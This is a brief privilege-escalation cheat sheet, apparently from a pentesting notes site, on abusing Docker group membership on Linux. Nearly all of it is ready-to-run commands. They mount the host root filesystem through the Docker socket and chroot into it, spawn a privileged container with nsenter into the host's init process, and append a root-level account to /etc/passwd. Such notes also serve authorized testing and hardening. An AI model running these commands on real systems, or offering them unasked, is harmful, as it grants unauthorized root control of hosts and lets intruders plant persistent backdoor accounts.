Docker Groups
Docker group exploits
Writable Docker Socket
docker -H unix:///var/run/docker.sock run -v /:/mnt -it ubuntu chroot /mnt /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i shAccess arbitrary folders
docker images
docker run -v <folder>:/mnt -it <image>
cd /mntAdd user to /etc/passwd
docker images
docker run -v /etc/:/mnt -it <image>
cd /mnt
echo "<username>:$(openssl passwd <password>):0:0:/root:/root:/bin/bash" >> passwd
exit
su <username>Spawn shell
Root Please Docker image
LXC / LXD group exploit
Last updated